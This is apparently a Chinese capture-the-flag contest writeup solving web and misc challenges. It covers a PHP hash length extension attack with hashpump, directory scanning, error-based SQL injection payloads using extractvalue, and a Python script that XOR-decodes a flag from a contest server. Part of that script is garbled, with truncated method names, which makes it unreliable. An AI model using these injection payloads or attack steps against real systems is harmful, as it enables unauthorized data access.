校赛 writeup

校赛 writeup

web

1.warmup-web

打开响应消息头，发现路径/NOTHERE
访问即得flag

2.web1

看源码得到

<?php
$flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$secret = "xxxxxxxxxxxxxxxxxxxxxxxxxxx"; // guess it length :)
$username = $_POST["username"];
$password = $_POST["password"];
$cookie = $_COOKIE['albert'];
if (!empty($_COOKIE['albert'])) {
if (urldecode($username) === "admin" && urldecode($password) !=="admin") {if ($_COOKIE['albert'] === md5($secret . urldecode($username . $password))) {echo "Congratulations! here is your flag.n";die ("The flag is ". $flag);}else {die ("Cookie Not Correct");}
}
else {die ("Go AWAY");
}
}
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
?>
<!--  -->

由题易知是hash长度扩展攻击
在kali下运用hashpump进行攻击一开始不知道长度，利用爆破可知长度为26位

>> hashpump
Input Signature: 968c31570a2a3afa076112687ecca974
Input Data: admin
Input Key Length: 26
Input Data to Add: pcat

3.web2

这题直接运用kali DirBuster
扫描目录扫到了
/x/index.php
/.php
/x/register.php
/x/connect.php
/x/login.php
/flag.php
最终答案在/flag.php中

4.web4

一道简单的报错注入题
利用burp截包修改id
最后payload为

id=1%27 and extractvalue(1,concat(0x5c,(select password from albertchang),0x5c,1))%23
或者是
id=-1%27 or extractvalue(1,concat(0x5c,(select password from albertchang),0x5c,1))%23

出来后

根据提示需要post flag = Th3_Pas3W0rd_i3_Albertchang

最后得到flag

5.web6

拿到这题时直接分析，网页源码
发现了隐藏的HTML文档

知道了这题的知识点
流密码其实就是逐比特异或
在隐藏部分发现异或过后的flag

flag 的长度大于500
所以构造提交参数大于500和message逐比特异或
写脚本如下
这里有个坑，我用requests方法请求网页，获取不了隐藏的HTML内容
所以只能使用httplib方法

 # yz:2016.12.25# -*- coding:utf-8 -*- 
import string
import httplib,urllib
data = urllib.urlencode({'arg':'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'});     
conn = httplib.HTTPConnection("45.32.58.123:12223");
headers = {"Content-Type":"application/x-www-form-urlencoded",       "Connection":"Keep-Alive","Referer":":12223/"};       
quest(method="POST",url="/main.php",body=data,headers=headers);          
s = sponse();    
content = ad())
Message = content[content.index("Message:")+9:content.index("<!-- Flag Here")-6]
Message = place(r'x',"")
Message = int(Message,16)
Flag = content[content.index("Here")+5:content.index("--></body>")]
s = ''
#转成01比特
for i in Flag:temp = ord(i)temp = bin(temp)temp = str(temp)[2:]if len(temp) < 8:temp = '0'*(8-len(temp))+temps += temp
Flag = int(s,2)
src = 200686490938213618932925030686723900966346071385575706818931139925151927414142413276833387391430903367465157760813819133574082739102368183356464973743987837722948595492712901641873403594450204695713629139533103392519371071099952645246840782481900957871935637359154437252913405444179654300427180044691385965990823568106696476515287748546363867017174091051797450964111012257685851865814304288305868868796070362487761893449386893361922901844324634350334616783957894220005538964792468979405328145100453460098854853839989027847783206845004095945185162744506591411155318233223679027298329085177274095914773286471049161702613799175486411492003372288722716950913877957802694948679785419083224812096387329082981115878996013259272222472356069166820222490810121435442820722489119884073056358155724651716232802987659573867435059545130785856458655309902770151770043405778785036718566031651260115600041084237592155873140867644089767487877289411629787419400386757597222832981129288874883921314078446307643819572105712219875309974530695306897012252757579812647497998317030864635355185457048473443750962962325959236879327971895179877812488472241671023567097665713934032193125740463764283516105833757192335092325954137896621052635084041994822566883633L
end = Flag^Message^src
s = str(hex(end))[2:][:-1]
string = ''
for i in range(0,len(s),2):string += chr(int(s[i:i+2],16))
print string
conn.close();  

最后得到

misc

1.warmup-misc

s='UAUSAB1QUFBQUFAbfQ=='def decode(s,k):r=s.decode('base64')l=''assert len(k)==1for i in r:l = l + chr(ord(i)^ord(k))return l[:-1